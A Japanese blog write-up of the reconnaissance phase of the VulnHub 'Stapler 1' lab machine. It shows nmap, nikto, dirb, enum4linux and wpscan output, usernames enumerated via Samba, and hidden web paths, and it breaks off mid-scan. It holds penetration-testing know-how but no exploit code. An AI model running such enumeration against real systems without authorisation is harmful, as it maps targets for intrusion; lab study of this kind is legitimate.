vulnhub Stapler 1 雑記
Stapler 1
サービス調査
# nmap -p- 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 22:42 EDT
Nmap scan report for 10.10.10.14
Host is up (0.00075s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
12380/tcp open unknown
MAC Address: 08:00:27:ED:2F:88 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 117.87 seconds
# nmap -Pn -p20,21,22,53,80,123,137,138,139,666,3306,12380 -sV --version-all 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 22:46 EDT
Nmap scan report for 10.10.10.14
Host is up (0.00049s latency).
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain dnsmasq 2.75
80/tcp open http PHP cli server 5.5 or later
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.80%I=9%D=5/11%Time=5EBA0DFF%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1350,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1
SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0
SF:4\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa
SF:2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\
SF:x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\x
SF:b2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu
SF:\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd
SF:3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa
SF:0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x
SF:87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\x
SF:f4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\x
SF:dc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd
SF:5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xa
SF:f\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:
SF:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\
SF:x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\
SF:xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd
SF:\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\
SF:x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\
SF:xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\
SF:xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak
SF:\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\
SF:xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f
SF:\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\
SF:[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\x
SF:cc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa
SF:7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\
SF:xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x9
SF:6\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f
SF:\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4
SF:\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\
SF:x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xb
SF:cL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0
SF:\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\
SF:xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\x
SF:f3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\
SF:?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 08:00:27:ED:2F:88 (Oracle VirtualBox virtual NIC)
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.38 seconds
何かzipぽいバイナリが見えるけどどうやって変換するか分からん。
気になりどころ
- [port 21] ftp vsftpd 2.0.8 or later
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
- [port 53] domain dnsmasq 2.75
- [port 80] http PHP cli server 5.5 or later
- [port 139] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
- [port 666] open doom?
- [port 3306] mysql MySQL 5.7.12-0ubuntu1
- [port 12380] http Apache httpd 2.4.18 (Ubuntu)
はじめてのwellknown port外サービス検出。
doom?
詳細
[port 21] ftp vsftpd 2.0.8 or later
今回は珍しくftpのバージョンが曖昧。
# ftp 10.10.10.14 Connected to 10.10.10.14. 220- 220-|-----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|-----------------------------------------------------------------------------------------| 220- 220 Name (10.10.10.14:root): 331 Please specify the password. Password: 530 Login incorrect. Login failed. ftp> ls 530 Please login with USER and PASS. ftp: bind: Address already in use ftp> exit 221 Goodbye.
ftpのログインはダメだったが、何かのヒントらしきものが見える。
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
user enumしても分からん。
[port 53] domain dnsmasq 2.75
dnsサーバはアプローチが全く分からん。
# searchsploit dnsmasq
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference | exploits/windows/dos/9617.txt
Dnsmasq < 2.78 - 2-byte Heap Overflow | exploits/multiple/dos/42941.py
Dnsmasq < 2.78 - Heap Overflow | exploits/multiple/dos/42942.py
Dnsmasq < 2.78 - Information Leak | exploits/multiple/dos/42944.py
Dnsmasq < 2.78 - Integer Underflow | exploits/multiple/dos/42946.py
Dnsmasq < 2.78 - Lack of free() Denial of Service | exploits/multiple/dos/42945.py
Dnsmasq < 2.78 - Stack Overflow | exploits/multiple/dos/42943.py
Web Interface for DNSmasq / Mikrotik - SQL Injection | exploits/php/webapps/39817.php
dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) | exploits/linux/dos/48301.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
たぶん無し?
[port 80] http PHP cli server 5.5 or later
phpのhttpは珍しい気がする。
# nikto -h 10.10.10.14 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.14 + Target Hostname: 10.10.10.14 + Target Port: 80 + Start Time: 2020-05-11 23:29:07 (GMT-4) --------------------------------------------------------------------------- + Server: No banner retrieved + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information. + OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration. + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response + Scan terminated: 20 error(s) and 5 item(s) reported on remote host + End Time: 2020-05-11 23:29:31 (GMT-4) (24 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
「.bashrc」とかあるし、ユーザのホームディレクトリで動いてる?
# dirb http://10.10.10.14
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 11 23:33:56 2020
URL_BASE: http://10.10.10.14/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.14/ ----
+ http://10.10.10.14/.bashrc (CODE:200|SIZE:3771)
+ http://10.10.10.14/.profile (CODE:200|SIZE:675)
-----------------
END_TIME: Mon May 11 23:34:07 2020
DOWNLOADED: 4612 - FOUND: 2
とりあえず、「.bashrc」が気になる。
$ cat bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
esac
# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color|*-256color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# Add an "alert" alias for long running commands. Use like so:
# sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
chrootの脆弱性を見たことがあるので何かあるかもしれない。
ついでに、「.profile」
$ cat profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.
# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022
# if running bash
if [ -n "$BASH_VERSION" ]; then
# include .bashrc if it exists
if [ -f "$HOME/.bashrc" ]; then
. "$HOME/.bashrc"
fi
fi
# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
PATH="$HOME/bin:$PATH"
fi
どっちみち、shellが取れないと有用ではなさそう。 php cli serverの脆弱性も上手く見つけられないので詰みかな。
[port 139] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
# enum4linux 10.10.10.14 (snip) ====================================================================== | Users on 10.10.10.14 via RID cycling (RIDS: 500-550,1000-1050) | ====================================================================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-864226560-67800430-3082388513 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-32 and logon username '', password '' (snip) S-1-22-1-1000 Unix User\peter (Local User) S-1-22-1-1001 Unix User\RNunemaker (Local User) S-1-22-1-1002 Unix User\ETollefson (Local User) S-1-22-1-1003 Unix User\DSwanger (Local User) S-1-22-1-1004 Unix User\AParnell (Local User) S-1-22-1-1005 Unix User\SHayslett (Local User) S-1-22-1-1006 Unix User\MBassin (Local User) S-1-22-1-1007 Unix User\JBare (Local User) S-1-22-1-1008 Unix User\LSolum (Local User) S-1-22-1-1009 Unix User\IChadwick (Local User) S-1-22-1-1010 Unix User\MFrei (Local User) S-1-22-1-1011 Unix User\SStroud (Local User) S-1-22-1-1012 Unix User\CCeaser (Local User) S-1-22-1-1013 Unix User\JKanode (Local User) S-1-22-1-1014 Unix User\CJoo (Local User) S-1-22-1-1015 Unix User\Eeth (Local User) S-1-22-1-1016 Unix User\LSolum2 (Local User) S-1-22-1-1017 Unix User\JLipps (Local User) S-1-22-1-1018 Unix User\jamie (Local User) S-1-22-1-1019 Unix User\Sam (Local User) S-1-22-1-1020 Unix User\Drew (Local User) S-1-22-1-1021 Unix User\jess (Local User) S-1-22-1-1022 Unix User\SHAY (Local User) S-1-22-1-1023 Unix User\Taylor (Local User) S-1-22-1-1024 Unix User\mel (Local User) S-1-22-1-1025 Unix User\kai (Local User) S-1-22-1-1026 Unix User\zoe (Local User) S-1-22-1-1027 Unix User\NATHAN (Local User) S-1-22-1-1028 Unix User\www (Local User) S-1-22-1-1029 Unix User\elly (Local User) (snip)
残念ながらSambaのバージョンは分からなかったけど、 userは色々見つけた。 以上。 本当はmetasploit使えば新たな展開があるだろうけど、あまり頼りたくない。
[port 666] open doom?
doom?
調べたらまさかのゲームの「DOOM」のプロトコル?
マジか?
とりあえずexploit探したけれど見つからず。
そういえば、nmapで確認したときに出てきた謎バイナリport 666から来てたような
firefoxでport 666を開くと文字化けが表示され、curlしてみたら「HTTP 0.9なので無理」と言われた。
仕方が無いので、firefoxでダウンロードする。とりあえず、「data.zip」というファイル名でダウンロードしてみたところ
# file data.zip data.zip: Zip archive data, at least v2.0 to extract
やはりzip
# unzip data.zip Archive: data.zip inflating: message2.jpg # file message2.jpg message2.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, baseline, precision 8, 364x77, components 3
画像を表示してみると
~$ echo Hello World. Hello World. ~$ ~$ echo Scott, please change this message segmentation fault
という謎メッセージが。うーむ。
# exiftool message2.jpg ExifTool Version Number : 11.94 File Name : message2.jpg Directory : . File Size : 13 kB File Modification Date/Time : 2016:06:03 11:03:07-04:00 File Access Date/Time : 2020:05:12 00:22:45-04:00 File Inode Change Date/Time : 2020:05:12 00:22:21-04:00 File Permissions : rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 Resolution Unit : None X Resolution : 72 Y Resolution : 72 Current IPTC Digest : 020ab2da2a37c332c141ebf819e37e6d Contact : If you are reading this, you should get a cookie! Application Record Version : 4 IPTC Digest : d41d8cd98f00b204e9800998ecf8427e Image Width : 364 Image Height : 77 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1) Image Size : 364x77 Megapixels : 0.028
cookie? すごいヒントなのかもしれないが何のcookieなのか分からん。
[port 3306] mysql MySQL 5.7.12-0ubuntu1
ここまで、mysqlの手がかりは特に無かったのでログインできず。
[port 12380] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.14 -p 12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.14
+ Target Hostname: 10.10.10.14
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2020-05-12 00:47:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Hostname '10.10.10.14' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8019 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2020-05-12 00:52:42 (GMT-4) (298 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
今まで悩んでいたのは何だったんだというぐらいの大判振る舞い
# dirb http://10.10.10.14:12380
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue May 12 00:54:06 2020
URL_BASE: http://10.10.10.14:12380/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.14:12380/ ----
-----------------
END_TIME: Tue May 12 00:55:14 2020
DOWNLOADED: 4612 - FOUND: 0
そろそろdirbからの乗り換え時期だろうか。
では、「robots.txt」から確認していく。
firefoxでport 12380にアクセスしてみる。
wordpressぽいデザインを使ったページが返ってきた。
しかし、「robots.txt」は表示されずホームページが返ってきた。
何故?
仕方が無いので「/admin112233/」,「/blogblog/」,「/phpmyadmin/」を見ていくことにする。
また、ホームページが返ってきた。
何を要求してもホームページしか返さない使命を持っているようだ。
何でだぁ。
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2020-05-12 00:47:44 (GMT-4)
---------------------------------------------------------------------------
そういえばniktoの結果にこんなのあったな。
おかしいなぁhttpsじゃない...のに...?
それじゃん。
# curl -k https://10.10.10.14:12380/robots.txt User-agent: * Disallow: /admin112233/ Disallow: /blogblog/
firefoxでもhttpsならホームページ以外を見れるようになった。
curlだと証明書が無く、無理に接続するときは-kオプション。
改めて、「/admin112233/」,「/blogblog/」,「/phpmyadmin/」を見ていく。
「/admin112233/」を見ると
This could of been a BeEF-XSS hook;)
とalert()ぽいのが表示された。
何を言っているのかよく分からないが、誰か「beef-xss」でも使っていたのかね。
「/admin112233/」を見ると、wordpressぽいブログが表示される。
とりあえず脳死でLog in admin/adminをしたが通らず。
やっと真面目にwpscanの活躍するときが来たか。
# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog -e at,ap,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: https://10.10.10.14:12380/blogblog/ [10.10.10.14]
[+] Started: Tue May 12 03:34:51 2020
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.18 (Ubuntu)
| - Dave: Soemthing doesn't look right here
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://10.10.10.14:12380/blogblog/xmlrpc.php
| Found By: Headers (Passive Detection)
| Confidence: 100%
| Confirmed By:
| - Link Tag (Passive Detection), 30% confidence
| - Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] https://10.10.10.14:12380/blogblog/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Registration is enabled: https://10.10.10.14:12380/blogblog/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: https://10.10.10.14:12380/blogblog/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: https://10.10.10.14:12380/blogblog/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
| Found By: Rss Generator (Passive Detection)
| - https://10.10.10.14:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
| - https://10.10.10.14:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
[+] WordPress theme in use: bhost
| Location: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/
| Last Updated: 2019-12-08T00:00:00.000Z
| Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/readme.txt
| [!] The version is out of date, the latest version is 1.4.4
| Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
| Style Name: BHost
| Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
| Author: Masum Billah
| Author URI: http://getmasum.net/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2.9 (80% confidence)
| Found By: Style (Passive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating All Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:31 <===================================> (20900 / 20900) 100.00% Time: 00:00:31
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] Theme(s) Identified:
[+] bhost
| Location: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/
| Last Updated: 2019-12-08T00:00:00.000Z
| Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/readme.txt
| [!] The version is out of date, the latest version is 1.4.4
| Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css
| Style Name: BHost
| Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
| Author: Masum Billah
| Author URI: http://getmasum.net/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Known Locations (Aggressive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/, status: 500
|
| Version: 1.2.9 (80% confidence)
| Found By: Style (Passive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css, Match: 'Version: 1.2.9'
[+] creative-blog
| Location: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/
| Last Updated: 2020-03-01T00:00:00.000Z
| Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/readme.txt
| [!] The version is out of date, the latest version is 1.1.3
| Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/style.css
| Style Name: Creative Blog
| Style URI: http://napitwptech.com/themes/creative-blog/
| Description: Creative Blog is an extremely creative WordPress theme to create your own personal blog site very ea...
| Author: Bishal Napit
| Author URI: http://napitwptech.com/themes/
|
| Found By: Known Locations (Aggressive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/, status: 500
|
| Version: 0.9 (80% confidence)
| Found By: Style (Passive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/style.css, Match: 'Version: 0.9'
[+] sydney
| Location: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/
| Last Updated: 2020-03-13T00:00:00.000Z
| Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/readme.txt
| [!] The version is out of date, the latest version is 1.60
| Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/style.css
| Style Name: Sydney
| Style URI: http://athemes.com/theme/sydney
| Description: Sydney is a powerful business theme that provides a fast way for companies or freelancers to create ...
| Author: aThemes
| Author URI: http://athemes.com
|
| Found By: Known Locations (Aggressive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/, status: 500
|
| Version: 1.28 (80% confidence)
| Found By: Style (Passive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/style.css, Match: 'Version: 1.28'
[+] trope
| Location: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/
